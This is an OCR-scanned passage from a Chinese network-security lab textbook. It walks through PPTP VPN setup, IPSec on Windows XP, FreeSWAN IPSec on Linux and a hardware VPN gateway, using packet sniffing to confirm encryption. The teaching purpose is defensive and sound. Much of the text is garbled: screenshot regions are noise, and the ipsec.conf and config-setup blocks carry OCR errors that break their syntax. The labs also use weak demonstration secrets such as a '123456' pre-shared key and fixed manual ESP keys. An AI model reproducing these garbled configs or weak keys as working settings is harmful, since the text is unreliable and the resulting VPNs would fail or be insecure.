(11) Æ [VPN 服务 器 选择 】 界 面 中 ,填写 IP 地 址 时 请 填 入 服务 器 的 TP 地 址 ， 根 据 
开始 时 的 约定 此 处 为 192.168.2.254， 如 图 10-9 所 示 。 
(12) 单 击 【 下 一 步 】 按 钮 后 向 导 将 提示 配置 完成 ， 选 择 【 完 成 】 弹出 【拨号 】 
窗口 ， 此 时 请 输入 在 服务 器 中 所 开放 权限 的 用 户 名 和 相关 密码 ， 然 后 单 击 【 连 接 】 


按钮 。 


(13) 为 了 更 清楚 地 观察 连接 建立 过 程 ， 在 此 推荐 使 用 软件 TCPView， 该 软件 可 以 
动态 显示 当前 的 活动 端口 的 状态 ， 如 图 10-10 所 示 为 建立 连接 时 ， 服 务 器 的 端口 变化 。 
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新 建 连接 向 导 


wee 服务 器 选择 
VEN 服务 器 的 名 称 或 地 址 是 什么 ? 


输入 您 正 连接 的 计算 机 的 主机 名 或 IP 地 址 。 


主机 名 或 IP 地 址 PUM. microsoft. com 或 157.54.0.1) QD: 
192. 168. 2. 254 


CESON) ( wm | 
图 10-9 [VPN 服务 器 选择 】 界 面 


分 别 在 客户 端 和 服务 器 观察 端口 状态 变化 ， 并 留意 分 别 是 什么 端口 。 


$ ICPView - Sysinternals: www. sysinternals. com 
File Options Process View Help 
Ma 一 


Process Local Address 一 一 Address Remote Port 
E] aspnet, st i 

Ej] svchost. exe 

E] svchost. exe 


jal 
E 
5 
R 


ouct OCO wi 


E] alg. eze 


Eum 
TTE 


E us. 
日 spsskespo .. 


图 10-10. 利用 TCPView 查看 连接 状态 


(14) 在 客户 端 ping 192.168.2.254 这 个 地 址 ， 同 时 在 嗅 探 机 上 开启 嗅 探 功能 ， 包 
图 10-11 和 图 10-12 所 示 分 别 为 建立 VPN 连接 前 后 Sniffer Pro 抓 取 的 数据 包 的 内 容 。 - 
以 发 现 ，VPN 连接 建立 后 Sniffer Pro 识别 出 数据 包 是 GRE 协议 的 ， 与 VPN 连接 建立 前 
观察 到 的 ICMP 数据 包 已 经 不 同 了 。 
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68.2.254] ICMP: 
168.2.18] C 


Echo reply 
Echo 


P 
P 
[P 
[P 
[P 
[P 


[132.168.2.254]| [192.168 
EE 


rian aco 


Source addre: 
{3 IP: Destination a 
No options 


ICMP: [Normal end of "ICMP header". ] 


Decode A Matrix À Host Table À Protocol Dist. À Statistics 


图 10-11 VPN 连接 建立 前 Sniffer Pro 抓 取 的 数据 包 


18] |GRE: vl Key=32768 
254]|ICMP: E 


Flag - 30 
0.. = Checksum and offset field present if routing field set 
0 * Offset field not present 
1 * Payload length and call ID field present 
1 * Sequence number field present 
0 = No strict source route 
Flag - 01 
0 = Àcknovledge field not present 
Version EE 
Protocol type = 880B (PPP) 
Payload length = 66 
Call ID = 10210 


Sequence number = 66 


Point-to-Point Protocol 一 一 


Protocol = FD (First Choice Compression) 


Flags = FX 
1 = History buffer initialized ( Bit A ) 
1. = Packet moved in front of History buffer ( Bit B ) 


= Has no significance in MPPE (Bit C) 
m: = Packet is encrypted (Bit D) 
Coherency Count = 61490 

63 bytes Compressed and Encrypted Data 


00000020: 02 te 30 01 88 0b 00 42 27 e2 00 00 00 42 fd £0 10.?.B'?.. 
00000030: 32 85 ce 82 eb 51 c8 36 a7 8c Ob a6 85 34 50 c8 2880? 4PI 


N Expert À Decode Matri A Host Table J, Protocol Dist. À Statistics 7 


£ 


图 10-12. VPN 连接 建立 后 Sniffer Pro 抓 取 的 数据 包 


【实验 报告 】 
根据 实验 步 又， 逐一 完成 每 一 步 的 配置 。 查 看 每 一 步 的 实验 结果 和 上 面 叙 述 的 是 否 
一 致 ， 如 果 不 一 致 ， 请 分 析 原 因 。 


113 


网 络 安 全 实验 教程 (第 2 版 ) mm 


【思考 题 】 

(1) 简单 叙述 PPTP VPN 的 特点 。 

(2) 在 PC 下 重复 Windows 中 的 基于 PPTP VPN 的 配置 步骤 。 

(3) 实 验 中 在 客户 端 ping 192.168.2.254 这 个 地 址 。 若 有 其 他 机 器 在 链 路 中 进行 嗅 探 ， 
该 C/S 通信 使 用 的 TP 地 址 应 该 是 什么 ? 


403 Windows XP 环境 下 IPSec VPN 的 配置 


【实验 目的 】 

本 实验 主要 验证 IP 通信 在 建立 IPSec 隧道 前 后 的 变化 ， 为 了 简化 实验 过 程 ， 这 里 只 
对 ICMP 进行 加 密 ， 但 在 配置 的 过 程 中 即 可 发 现 ， 其 他 P 协议 要 进行 同样 的 加 密 也 是 非 
常 简单 的 。 实 验 的 拓扑 跟 上 面 的 实验 一 样 ， 只 是 逻辑 上 两 台 实验 机 为 点 对 点 的 。 


【原理 简介 】 

IPSec 在 IP 层 上 对 数据 包 进 行 高 强度 的 安全 处 理 ， 提 供 数据 源 地 址 验证 、 无 连接 数 
据 完整 性 、 数 据 机 密 性 、 抗 重播 和 有 限 业 务 流 机 密 性 等 安全 服务 。 各 种 应 用 程序 可 以 享 
用 P 层 提供 的 安全 服务 和 密 钥 管理 ， 而 不 必 设 计 和 实现 自己 的 安全 机 制 ， 因 此 减少 了 
密 钥 协商 的 开销 ， 也 降低 了 产生 安全 漏洞 的 可 能 性 。 


【实验 环境 】 

实验 中 使 用 以 下 软件 和 硬件 设备 。 

(1) Windows XP 操作 系统 (使 用 Windows 2000 Professional 是 相 类 似 的 )。 
(2) 一 个 Hub 集线器 。 

(3) 三 台 装 有 操作 系统 的 台式 PC (或 者 其 中 一 台 采 用 笔记 本 )。 

实验 环境 拓扑 结构 如 图 10-13 所 示 。 


Windows XP Windows XP 
IP 192.168.2.111 IP 192.168.2.254 


图 10-13 实验 环境 结构 


【实验 步骤 】 
(1) 为 了 观察 方便 ， 首 先 把 嗅 探 者 的 嗅 探 软 件 〈Sniffer Pro) 打开 ， 然 后 在 两 台 机 器 
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中 启动 PING, 即 在 192.168.2.111 机 器 中 使 用 命令 ping 192.168.2.254 -t, 而 在 192.168.2.254 


机 器 中 使 用 命令 Ping 192.168.2.111 -t。 这 样 可 以 看 到 两 台 机 器 均 色 
在 嗅 探 器 中 ， 同 样 会 显示 其 正常 的 ICMP 通信 (如 图 10-14 所 示 )。 


显示 正常 的 回应 。 而 


Sou 
[t 

1[192.168-2-254]| [192. 
|[192:168:2:111] [192 
|[192.168.2.254] [192 Echo reply 
[ Echo 

[ Echo reply 
[ Echo 

n Echo reply 


192:168:2:111] [192: 
192.168.2.254]|[192 
192.168.2:111]|[192 

2.254]| [192 


sum = 385A (correct) 
mtifier = 1280 


(Normal end of "ICMP header". ] 


14 85 10 8b 1d 00 1c 25 9f 2c 33 08 00 45 00 
Sd be 00 00 40 01 96 95 c0 a8 02 6f c0 Er dod [ 


Ha Mu ele Ru e See UEM EEG 


9 6a c éd be 
5 a d 63 a & 66 67 68 69 


EF 90 1 92 93 94 76 76 ghijkh 
[7 0 al 
wabedef gh: 


Expert) Decode A Matrix À Host Table )\ Protocol Dist. )\ Statistics 7 


图 10-14” 嗅 探 软 件 Sniffer Pro 


(2) 能 观察 到 两 端的 正常 通信 后 ， 开 始 IPSec 的 配置 。 打 开 控 制 面板 中 的 【管理 工 
FLY, 双击 里 面 的 【本 地 安全 策略 】. 右 击 左边 树 状 菜 单 中 的 【IP 安全 策略 , 在 本 地 机 器 】， 


如 图 10-15 所 示 。 


E 本 地 安全 设置 
XO MEW SEV PD 
-2|&m|B Be | ida 


国安 全 设置 zh; E | 第 略 

Gg 账户 策略 GÀEHS GE WAA 通信 息 是 使 E 

@ 本 地 第 略 EPR wag) ERME (不 安全 的 )。 * 
z 


a Ca aes hie. 
i E prog 便服 务 器 (请 求 安全 ) NAA IF 通信 总 是 使 


D IP 安全 策略 C) 


管理 IF Mies AMM TE U) 
所 有 任务 QD 


*$0 


Bie) 
导出 列表 L). 


帮助 0 


图 10-15 本 地 安全 设置 


(3) 选择 右键 菜单 中 的 【创建 IP 安全 策略 ])， 系 统 将 弹出 【IP 安全 策略 向 导 】 如 
图 10-16 所 示 。 单 击 【 下 一 步 】 按 钮 。 然 后 为 该 安全 策略 命名 ， 如 “icmp-ipsec”， 再 单 


击 【 下 一 步 】 按 钮 。 
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IP 安全 策略 向 导 . 


安全 通信 请 求 
指定 这 个 策略 如 何 对 安全 通信 的 请 求 做 出 反应 。 


RU 当 没 有 其 地 bn 远程 计算 机 做 出 啊 
应 。 bx ^Y 信 请 求 项 出 响应 。 
r BEEERUURIRHRUNT QD. 


图 10-16 OP 安全 策略 向 导 】 去 掉 【 激 活 默认 响应 规则 】 的 选择 


(4) 在 【安全 通信 请 求 】 对 话 框 中 ， 去 掉 【 激 活 默认 响应 规则 】 的 选择 ， 单 击 【下 
一 步 】 按 钮 ， 此 时 已 完成 了 安全 策略 向 导 ， 保留 【编辑 属性 】 的 选择 ， 然 后 单 击 【 完 成 】 
(5) 完成 后 ， 将 立即 弹出 其 属性 对 话 框 。 首 先 去 掉 【 使 用 “添加 向 导 ”】 的 选择 ， 然 
后 单 击 【 添 加 】 按 钮 ， 弹 出 如 图 10-17 所 示 的 对 话 框 。 
(6) 在 【IP 筛选 器 列表 】 选 项 卡 中 ， 选 择 【 所 有 ICMP 通信 量 】 由 于 软件 本 身 表 
达 如 此 ， 故 未 改 。 
(7) 单 击 【筛选 器 操作 】 标 签 。 选 择 【 筛选 器 操作 】 列 表 中 的 【需要 安全 】 
(8) 单 击 【 身 份 验 证 方法 】 标 签 ， 单 击 【添加 】 按 钮 ， 弹 出 如 图 10-18 所 示 的 对 
话 框 。 
新 身份 验证 方法 属性 
身份 验证 方法 


sia 身份 验证 方法 指定 了 计算 机 间 如 何 建立 信任 。 


新 规则 属性 多 贺 

IP FRSA | 第 选 器 操作 身份 验证 方法 | 隆 道 设置 | 连接 类 型 | C. Active Directory BUIH Kerberos VS 协议 ) W 
Bio pN m MAEAEA Potete EE 

TP SRBC): G 使 用 此 字符 审 GEUEEW) ©): 

称 123458 

OPA 10m 通信 量 PE 该 计 算 机 与 任何 其 他 计算 
OMA IF 通信 重 匹配 该 计算 机 到 任何 其 好 计算 
Emo. | emo. | Beo 


Caz) SRW ] 
图 10-17 新 规则 属性 图 10-18 ”新 规则 属性 一 一 身份 验证 方法 


O) 选择 【使 用 此 字 串 〈 预 共享 密 钥 )]， 然 后 输入 共享 密 钥 ， 此 处 使 用 “123456”， 
然后 单 击 【确定 】 按 钮 退出 。 
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(10) 回 到 【新 规则 属性 】 对 话 框 ， 单 击 【 确 定 】 按 钮 退出 。 同 样 ， 回 到 【icmp-ipsec 
属性 】 对 话 框 后 ， 单 击 【 关 闭 】 按 钮 退出 。 
(11) 回 到 【本 地 安全 设置 ] 窗口, 右 击 icmp-ipsec, 选择 【指派 】 菜 单项 , 如 图 10-19 


所 示 


3 


È 本 地 安全 设置 

文件 EE) REO SEW HH 

te» OxXSRB 2 Be VS 

Besse 名 称 j 策略 已 指派 
a C 账户 第 咯 mE 

s C9 本 地 策略 GASES mE 


& C124 un 
& Geen Er 


Sres man | E2828 cere 


Has w 
Eita) 
BHO 


指 扳 此 策略， 试图 设 成 活动 


图 10-19 本 地 安全 设置 icmp-ipsec 


(12) 此 时 观察 两 端 的 ICMP 通信 ， 将 发 现 以 下 情况 : 在 已 配置 策略 的 一 端 ， 系 统 将 
提示 Negotiating IP Security; 而 没有 配置 的 一 端 ， 系 统 直 接 提示 Request timed out， 如 
图 10-20 所 示 。 


NDOWS\systen32\cnd. exe 


y from 
y from 19 


y from 19 
y from 19 
y from 19 


im 
from 19 x e time<ims 


图 10-20 利用 ping 测试 


(130 在 另 一 端 ， 进 行 上 述 策略 的 同样 设置 〈 完 全 一 样 )， 请 再 次 观察 效果 ， 此 时 发 
现 ICMP 通信 恢复 了 正常 ， 重 点 在 于 嗅 探 机 的 变化 ， 如 图 10-21 所 示 。 

可 以 发 现 , Sniffer Pro 能 够 识别 出 数据 包 是 ESP 的 , 但 其 内 容 与 前 面 观察 到 的 ICMP 
数据 包 已 经 完全 不 同 了 。 


144 


Fragment offset = 0 
>: Time to live 


urity Parameters Index 0 
Number 


= DBOCOD173C7DFEFOC? 6C9DF75F34DC07 0DE= 


» 


00 14 85 10 8b 1d H lc 25 9f 2c 33 08 00 45 00 ??..333 E 
00000010: 00 60 60 Sb 00 00 a8 6f c0 [ 028185 off 
00000020: 02 te Gf üc 19 4c E 90 oi m db Oc 0a E ES 74 "aod 
7 5f 07 0d ed 4! Ic 2f A2 $8iR A 
00000040: 69 e5 46 76 8f f2 3f EH e6 59 fe Ob E 15 ER 9c Fv? € 
00000050: 6b 6a 55 dc c2 6c bc cc 59 62 59 c2 d7 c d? de P 1 
00000060: d2 65 bO 69 d0 09 b5 Ed bc ec eb di 86 mo ud 


N Expert À Decode Á Matrix A Host Table J Protocol Dist. )\ Statistics 7 


图 10-21. 利用 Sniffer Pro WPR 


【实验 报告 】 

根据 上 面 的 实验 步 又， 完成 实验 。 记 录 Sniffer Pro 软件 嗅 探 获 得 的 ICMP 数据 包 内 
容 ， 并 且 根 据 IP 协议 分 析 数 据 包 格 式 。 

【思考 题 】 

(1) 比较 直接 传输 的 数据 包 和 通过 VPN 传输 的 数据 包 的 不 同 。 

(2) 课 后 在 【IP 筛选 器 列表 】 中 ， 选 择 【 所 有 IP 通信 量 】， 测 试 其 他 网 络 协议 。 


404 Linux 环境 下 IPSec VPN 的 实现 


【实验 目的 】 

(1) 掌握 Linux 系统 下 FreeSWAN 软件 的 使 用 。 
(2) 掌握 Linux 系统 下 VPN 环境 的 搭建 。 

(3) 了 解 Linux 系统 下 IPSec 原理 。 


【原理 简介 】 
FreeSWAN 是 在 Linux 上 支持 IPsec 的 、 开 放 源 代码 的 VPN 实现 方案 。 


【实验 环境 】 
(D Wf PC. 
(2) 每 台 PC 上 安装 两 个 10/100M 的 以 太 网 卡 。 
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(3) 两 个 Hub 集线器 或 交换 机 。 

(4) 下 载 免 费 软件 模块 FreeSWAN。 

首先 在 甲乙 两 个 LAN 的 出 口 各 放置 一 台 Linux 服务 器 实现 IPSec 网 关 ， 都 安装 好 
FreeSWAN。 两 个 LAN 的 数据 分 别 通过 各 自 的 网 关 进入 公 网 ， 凡 是 经 过 该 网 关 的 数据 全 
部 都 是 加 密 的 。 在 效果 上 ， 两 个 LAN 的 用 户 可 以 互相 ping 到 对 方 的 机 器 ， 尽 管 它们 可 
能 一 个 是 192.168.1.0/24 网 段 ， 另 一 个 是 192.168.2.0/24 网 段 。 它 们 好 像 在 同一 个 局 域 网 
中 工作 , 没有 界限 。 公 共 网 络 的 加 密 部 分 对 它们 来 说 也 是 透明 的 。 而 两 个 LAN 在 公共 网 
络 上 交换 的 数据 是 密 文 的 。 这 就 是 虚拟 专用 网 VPN， 如 图 10-22 所 示 。 


eth1:100.100.100.100 


eth1:200.200.200.200 


eth0:192.168.1.1 eth0:192.168.2.1 
Hub 


192.168.1.0/24 192.168.2.0/24 
图 10-22 实验 环境 
有 关 信 息 如 下 : 
Left Net: 192.168.1.0/24。 
Left Gate (internal): 192.168.1.1. 
Left Gate (external): 100.100.100.100. 
Left Name: North. 
Right Net: 192.168.2.0/24. 
Right Gate (internal): 192.168.2.254. 
Right Gate (external): 200.200.200.200. 
Right Name: South. 


【实验 步骤 】 

1. 配置 ipsec.conf 文件 (/etc/ipsec.conf) 

现在 需要 在 ipsec.conf 文件 里 创建 连接 。 注 意 通 信 有 很 多 种 情况 : Net to Net, Left Gate 
to Right Net. Left Net to Right Gate, Gate to Gate。 每 一 种 情况 都 必须 有 一 个 连接 来 处 理 ， 
这 里 推荐 在 对 这 些 连 接 命 名 的 时 候 最 好 能 够 反映 通信 情况 。 本 例 中 需要 5 个 连接 ， 分 别 
是 %default、NorthNet-SouthNet、NorthGate-SouthNet、NorthNet-SouthGate 和 NorthGate- 
SouthGate， 注 意 名 字 中 不 能 有 空格 。 在 ipsec.conf 配置 文件 中 需要 加 入 下 面 的 内 容 。 

注意 ，%default 在 文件 中 已 经 存在 ， 它 说 明了 以 后 的 连接 所 用 的 加 密 或 认证 算法 以 
及 密 钥 和 SPI 等 。 一 般 情 况 下 密 钥 需要 改动 。 
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#defaults for subsequent connection descriptions 

conn $default 

#How persistent to be in (re)keying negotiations (0 means very). 
keyingtries=0 

#Parameters for manual-keying testing (DONT USE OPERATIONALLY) . 
spi=0x200 

esp-3des-md5-96 
espenckey-0x01234567 89abcdef 02468ace 13579bdf 12345678 9abcdef0 
espauthkey-0x12345678 9abcdef0 2468ace0 13579bdf 


然后 加 入 下 面 的 新 连接 。 


conn NorthNet-SouthNet 
left=100.100.100.100 
leftsubnet=192.168.1.0/24 
leftfirewall=yes 
right=200.200.200.200 
rightsubnet=192.168.2.0/24 
rightfirewall=yes 


conn NorthGate SouthNet 
left=100.100.100.100 
right=200.200.200.200 
rightsubnet=192.168.2.0/24 
rightfirewall=yes 


conn NorthNet SouthGate 
left=100.100.100.100 
leftsubnet=192.168.1.0/24 
leftfirewall=yes 
right=200.200.200.200 


conn SouthGate NorthGate 


left=100.100.100.100 
right=200.200.200.200 


现在 确定 一 下 在 config.setup 部 分 中 的 变量 设置 是 否 正 确 ， 它 是 如 下 形式 。 


config setup 
interfaces-$defaultroute 
klipsdebug-none 
plutodebug=none 
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interfaces 选项 可 用 来 确定 在 用 Ipsec 时 经 由 哪个 网 络 接 口 收发 数据 包 ， 如 果 设 为 
%defaultroute， 将 根据 机 器 的 路 由 表 中 的 路 由 表 项 决定 。 

klipsdebug 和 plutodebug 是 用 来 打开 或 关闭 调试 选项 ， 即 发 生 异 常 时 到 /var/log/ 
messages 中 加 入 出 错 信 息 。 

注意 ， 两 个 网 关 的 ipsec.conf 的 内 容 必 须 完全 一 臻 (除了 config setup 部 分 允许 有 差 
异 外 ， 网 卡 的 选项 、conn* 部 分 必须 一 臻 )， 否 则 IPsec 不 能 处 理 。 

2. 配置 ipsec.secrets 文件 

ipsec.secrets 文件 包含 两 个 网 关 之 间 的 对 称 加 密 算 法 所 使 用 的 密 钥 信息 。 两 个 网 关 的 
这 个 文件 必须 完全 一 致 。 里 面 的 内 容 为 : 


100.100.100.100 200.200.200.200 


"jxj52SjRmUu3nVW521Wul35R5k44uU51R2V3kujT24UllVumWSkT52TullWVnm 
1Vu251V52k4" 


VERS, ipsec.secrets 和 ipsec.conf 的 文件 必须 设 为 只 有 root 可 读 ， 普 通用 户 不 能 访 
问 ， 以 保证 安全 。 

3. 防火 墙 设置 

假设 用 iptables， 下 面 是 左边 网 关 的 例子 : 


iptables -A input -s 100.100.100.100 -d 0/0 -j ACCEPT 
iptables -A input -s 100.100.100.100 -d 192.168.2.0/24 -j ACCEPT 
iptables -A input -s 192.168.1.0/24 -d 192.168.2.0/24 -j ACCEPT 


它 允 许 从 自己 发 向 Internet 和 右边 子 网 的 包 通 过 ， 同 时 允许 从 左边 子 网 发 往 右边 子 
网 的 包 通 过 。 

4. 使 用 测试 

(1) 首先 启动 连接 ， 如 下 : 


[root@Tiger /etc]#ipsec manual --up NorthGate-SouthGate 
[root@Tiger /etc]#ipsec manual --up NorthGate-SouthNet 
[root@Tiger /etc]#ipsec manual --up NorthNet-SouthGate 
[root@Tiger /etc]#ipsec manual --up NorthNet-SouthNet 


(2) 然后 执行 查看 : 


[root@Tiger /etc]# ipsec look 


观察 其 输出 ， 如 果 与 下 面 的 信息 类 似 则 说 明 配 置 正确 。 


. cs.mynet.net Wed July 8 22:51:45 GAT 2000 ---------------------- 
192.168.1.0/24 -» 192.168.2.0/24 => tun0x200@192.168.2.254 
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esp0x202@192.168.2.254 


Destination Gateway Genmask Flags MSS Window irtt Iface 
192.0.0.0 0.0.0.0 255.255.255.0 U 1500 0 0 ethl 
192.168.2.0 192.168.2.254 255.255.255.0 UG 1404 0 0 ipsecO 


如 果 想 获取 更 多 信息 ， 可 以 运行 ipsec barf 进行 查看 。 

(3) 现在 来 检测 我 们 的 工作 :通过 ping 另 一 端的 内 部 网 的 机 器 , 用 tepdump 来 看 接口 
ipsec0 的 情况 。 

假设 在 192.168.2.15 上 ， 执 行 ping 192.168.1.25， 显 示 : 


64 bytes from 192.168.1.25: icmp seq-0 ttl-127 time=45.7 ms 


说 明 网 络 连接 已 经 建立 了 。 
(4) 在 200.200.200.200 上 执行 tcpdump -i ipsec0: 
tcpdump: listening on ipsec0 


21:02:52.873587 > 200.200.200.200 > 192.168.1.25: icmp: echo request 
21:02:52.921596 < 192.168.1.25 > 200.200.200.200: icmp: echo reply 


如 果 显 示 这 样 的 信息 , 表示 VPN 已 经 初步 搭 起 来 了 , 可 做 进一步 的 测试 。 比 如 在 “ 左 
边 ” 的 内 部 网 上 建立 一 个 Web 服务 器 ， 在 “右边 ”的 内 部 网 中 访问 此 Web 服务 器 ， 同 
寺 试 着 在 Internet 上 截获 数据 包 ， 看 看 数据 包 的 内 容 有 没有 被 加 密 。 

【实验 报告 | 

COD 根据 实验 步骤 ， 逐 一 完成 每 一 步 的 配置 。 查 看 每 一 步 的 实验 结果 和 上 面 叙 述 的 
是 否 一 致 ， 如 果 不 一 致 ， 请 分 析 原 因 。 

(2) 完成 上 面 的 实验 ， 搭建 好 VPN 后 ， 通 过 Sniffer Pro 截获 数据 包 ， 查 看 里 面 的 内 
容 是 否 经 过 加 密 。 

(3) 修改 ipsec.secrets 文件 中 的 密 钥 ， 再 重复 (2) 的 操作 ， 查 看 数据 包 是 否 已 经 
变化 。 


【思考 题 】 

(1) 结合 实验 10-3， 深 入 理解 IPSec 方式 的 VPN 搭建 过 程 。 

(2) 尝试 使 用 命令 ipsec ranbits 192>>ipsec.secrets， 产 生 随机 密 钥 字符 串 。 

(3) ipsec.secrets 文件 存储 了 两 个 网 关 之 间 的 对 称 加 密 算法 的 密 钥 ,结合 其 他 密码 学 
知识 ， 请 问 这 个 文件 如 何 安全 地 在 这 两 个 网 关 之 间 传送 呢 ? 
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405 ”硬件 VPN 的 配置 


在 本 实验 中 ， 选 择 了 由 北京 航空 航天 大 学 电子 信息 工程 学 院 自主 开发 的 VPN 产品 。 
该 产品 是 基于 NP 网 络 处 理 器 开发 的 新 一 代 芯片 级 VPN 产品 。 目 前 ， 该 产品 已 授权 北京 
西 普 阳光 教育 科技 有 限 公 司 独 家 代理 销售 。 


【实验 目的 】 

(1) 掌握 硬件 VPN 的 配置 使 用 。 

(2) 掌握 IPSec 规则 的 设置 。 

(3) 掌握 通用 VPN 客户 端 软 件 SSH Sentinel Policy Editor 的 使 用 。 
(4) 掌握 两 种 VPN 模式 : 网 络 到 网 络 、 网 络 到 主机 。 


【原理 简介 】 
IPSec 原理 同 前 。 


【实验 环境 】 

1. VPN 网 关 到 网 关 〈 预 共享 密 钥 模 式 ) 

根据 实验 拓扑 ， 实 现 网 络 1、 网 络 2 和 网 络 3 三 个 子 网 之 间 两 两 建立 VPN 隧道 。 下 
面 就 以 网 络 3 为 例 ， 分 别 与 网 络 1 和 网 络 2 之 间 建 立 VPN 连接 。 

VPN3 设备 的 eth0 所 连接 的 网 络 (172.16.3.0/24) 和 VPN2 的 ethO 所 连接 的 网 络 
(172.16.2.0/24) 间 形成 VPN 通道 。 其 中 ，VPN3 的 eth0 的 IP 地 址 为 172.16.3.2，eth3 的 
IP 地 址 为 182.16.3.1; VPN2 的 eth0 的 IP 地址 为 172.16.2.2, eth3 的 IP 地 址 为 182.16.2.1。 
网 络 拓扑 结构 如 图 10-23 所 示 。 


219.224.161.147 219.224.161.145 


219.224.161.146 


网 络 1:172.16.1.0/24 网 络 2:172.16.2.0/24 网 络 3:172.16.3.0/24 
图 10-23 网络 到 网 络 模式 VPN 实验 网 络 拓扑 结构 
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2. VPN 网 关 到 主机 ( 预 共 享 密 钥 模 式 ) 

通过 配置 VPN 和 PC， 使 得 VPN 的 ethl 所 连接 的 网 络 (192.168.0.0/24) 和 PC 
(192.168.1.13) 间 形 成 VPN 通道 。 其 中 , VPNI 
的 eth0 的 他 地 址 为 192.168.1.1, ethl 的 IP 地址 VPN Sino] 216851 
Fy 192.168.0.111; PC 的 IP 地 址 为 192.168.1.13。 hi.1921680111 
PC 上 采用 SSH 1.4 作为 IPSec 客户 端 。VPN1 
是 静态 的 ，PC 是 动态 的 。 网 络 拓扑 结构 如 
图 10-24 所 示 。 

【实验 步骤 】 


1. VPN 网 关 到 网 关 〈 预 共享 密 钥 模 式 ) Miki 
首先 在 VPN3 上 进行 如 下 设置 ， 进 入 【 系 图 10-24 ”网 络 到 主机 模式 VPN 实验 网 络 


: a 拓扑 结构 
统 配 置 】| 【网络 设置 】|【 网 口 信息 】 页 面 ， 
添加 如 图 10-25 所 示 的 信息 。 
网 口 信息 VLAN 路 由 括 组 管理 

Am ”工作 模式 。 I? 地 址 EB Https S Telnet 管 理 启用 Ping 服 务 器 ”操作 
ethO «BEM 。 172.16.2.2 255.255.255.0 yes yes yes [rj 
eh XH yes yes no 2 
eth2 ZA yes no yes gp 
eths BEM 182.16.2.1 255. 255. 255.0 yes no yes [2 


图 10-25 设置 网 口 
进入 【系统 配置 】| 【网络 设置 】|【 路 由 】 页 面 ， 添 加 路 由 如 图 10-26 所 示 。 


网 口 信息 VLAN 路 由 桥 组 管理 
目的 子 网 D] BX 网 D1 Aoz 网 D3 ”操作 
0.0.0.0 0.0.0.0 182. 16.2.2 Re 

an= 
FA 10-26 设置 路 由 


a 


EF 入 【安全 对 象 】|【 地 址 对 象 】|【 主 机 】 页 面 ， 添 加 主机 对 象 如 图 10-27 所 示 。 
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组 主机 网 络 aiam 
名 称 IPARES Erat 备注 Lus 
ethü local gx 1722.16.22 Bg 
ethó local gx 182 16.2.1 Bp mg 
next hop 182.16.2 2 Bg 
dd147 219.224. 161. 147 a mg 
addl45 219, 224, 161, 145 pg 
add145 219.224. 161. 146 p m 


图 10-27 IPSec 规则 配置 


进入 【安全 对 象 】|【 地 址 对 象 】| 【网络 】 页 面 ,添加 对 象 如 图 10-28 所 示 。 

要 注意 的 是 ， 所 要 用 到 的 地 址 对 象 都 要 事先 在 对 应 的 页 面 中 进行 设置 。 后 面 的 设置 
中 所 要 用 到 的 地 址 都 通过 对 象 的 方式 进行 添加 和 管理 。 注 意 ， 若 直接 将 IP 地 址 填 入 下 面 
对 应 的 位 置 ， 则 有 可 能 出 现 不 能 生效 的 情况 。 


组 主机 LL] CEET] 
E Tritt LI 备注 操作 
‘ethO_local_innet 172. 16.2.0 255. 255. 255.0 B Iri 
ethÓ remote innetl 172. 16.1.0 255. 255. 255.0 Ba 区 
athD_remote_innet3 172.16.3.0 255. 255. 255.0 D p 
ar 
FA 10-28 网 络 对 象 


接 下 来 ， 在 VPN3 上 进入 【虚拟 专 网 】IIPSec|【IPSec 配置 】 页 面 ,【ipsec 外 网 口 】 
选择 eth3,【 本 地 地 址 】 选 择 eth3 local gw,【 本 地 下 一 跳 】 选 择 next_hop《〈 在 实际 应 用 
中 ， 应 该 选择 网 关 地 址 ) 然后 单 击 【 提 交 】 按 钮 保存 ， 如 图 10-29 所 示 。 

接着 ,在 VPN3 EHA DEMEI] IPSEC] [IPSec 规则 】 页 面 ， 单 击 【 添 加 】 按 
钮 进入 【添加 /修改 】 页 面 来 添加 一 条 VPN 规则 。 具 体 设 置 如 图 10-30 所 示 ， 通 道 名 称 
为 to146〈 可 任意 指定 )。 

可 以 在 主页 面 中 看 到 这 条 VPN 规则 被 添加 了 。 同样 , 还 要 在 VPN1 和 VPN2 上 分 别 
进行 设置 。 对 象 的 定义 如 同 VPN3。 要 注意 的 是 ，VPN1/VPN2 上 的 本 地 网 络 与 远程 网 络 
分 别 为 VPN3 上 的 远程 网 络 和 本 地 网 络 , VPN1/VPN2 上 的 远程 网 关 地 址 设 为 VPN3 的 网 
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rre | nec [AN 
seen [PTET] 
ipse FIC: [etn E] 
本 地 地 址 : [side fF 
STM fert hop ———— 


局 用 WI 穿越; v 


局 用 ipsee; [v 
—— 
图 10-29 IPSec 配置 


关 地 址 ， 预 共享 密 钥 必须 与 VPN3 上 的 相同 ，VPN1/VPN2 上 的 本 地 ID 和 远程 ID 分 别 
为 VPN3 上 的 远程 ID 和 本 地 ID 。 单 击 【提交 】 按 钮 。 


IPSec 配置 TrsecR MI gums märts 
meaw fie "WX C 主 模式 C PRR 
ieri [HSE s] gp [une — ———— (2 
SRA: fod me — (E 运程 网 络 : [dre ime F 
WESS [MAFREN E] Base puxs —————— 
moe: p 
mm. [uewsse con ig [pne com 
s-menis: [ads s] ua [aes me lnodpres 0 m] oun 
ament: [nis 司 uu [pis] me [FAMS E] ws 
aaas [ ——— — — 0-200 REAREN [7 
perm 22 


图 10-30 IPSec 规则 


进入 【系统 维护 】| 【系统 状 态 】|【 服 务 状态 】 页 面 ， 启 动 IPSec 服务 ， 如 图 10-31 
所 示 。 


服务 状态 
服务 名 称 te B% | fit z8 - 
mcr Uraa Bex» Bags 
ns Diaz Ben Bags 
Tuwo Uraz Ba» zs 
TsEC Baas Bae Mza 
Paoxr Draw Bax ze 


图 10-31 IPSec 服务 启动 
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进入 【虚拟 专 网 】|IPSec|【 隧 道 状态 】])， 可 看 到 隧道 已 建立 ， 如 图 10-32 所 示 。 


IPSec 配置 IPSec 规则 RRS mäts 
连接 名 称 RAR FRE mära 
tol4T 已 建立 
tol45 Fax Y 


图 10-32 IPSec 隧道 建立 


2. VPN 网 关 到 主机 〈 预 共享 密 钥 模式 ) 

VPN 的 设置 同上 ， 下 面 主要 介绍 主机 VPN 的 设置 。 

在 某 台 主机 上 安装 VPN 客户 端 软件 SSH Sentinel。SSH Sentinel 为 美国 SSH 
Communications Security 公司 的 一 款 基 于 Windows 工作 站 安全 的 网 络 通信 软件 。 使 用 此 
软件 ，IP 数据 流 会 被 IETF 提出 的 IPSec 加 密 协议 加 密 ， 从 而 保证 了 管理 数据 的 安全 性 。 

下 面 是 该 软件 的 使 用 步骤 。 

